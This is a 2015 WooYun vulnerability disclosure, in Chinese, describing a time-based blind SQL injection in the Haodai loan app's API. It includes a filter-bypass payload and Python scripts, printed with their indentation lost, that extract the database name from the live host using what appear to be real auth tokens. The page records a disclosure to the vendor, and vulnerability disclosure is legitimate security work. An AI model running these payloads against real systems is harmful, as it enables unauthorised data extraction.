当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143792

漏洞标题:好贷网APP存在SQL注入漏洞(须绕过)

相关厂商:好贷网

漏洞作者: 路人甲

提交时间:2015-09-28 00:02

修复时间:2015-10-03 00:04

公开时间:2015-10-03 00:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-28: 细节已通知厂商并且等待厂商处理中
2015-10-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入+绕过

详细说明:

好贷网的“好贷APP”
检测了下发现以下url存在时间盲注,注入参数为:auth_did

http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd


QQ截图20150927220356.jpg


用SQLMap发现跑不出来,手工看了下,发现过滤了大小于号……
遂写Python程序跑了下:
1、跑数据库名长度:AND SLEEP(IF((SELECT LENGTH(DATABASE())=1,5,0))

import requests,time
for i in range(21):
url = r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372%20AND%20SLEEP%28IF%28%28SELECT%20LENGTH%28DATABASE%28%29%29%29='+str(i)+',5,0%29%29&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd'
st = time.time()
r = requests.get(url)
print 'Length:',i,time.time() - st


得到:LENGTH(DATABASE()) = 16
2、跑数据库名:AND SLEEP(IF(ascii(mid(database(),1,1))=1,5,0))

import requests,time
database = ''
for j in range(16):
i = 33
while i<127:
url = r'http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372 AND SLEEP(IF(ascii(mid(database(),'+str(j+1)+',1))='+str(i)+',10,0))&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd'
st = time.time()
r = requests.get(url)
if time.time() - st > 10:
database = database + chr(i)
print 'Database_name: ',database
break
i = i + 1


得到数据库名:interface_hd_com

QQ截图20150927221259.jpg

漏洞证明:

见"详细说明"

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-03 00:04

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无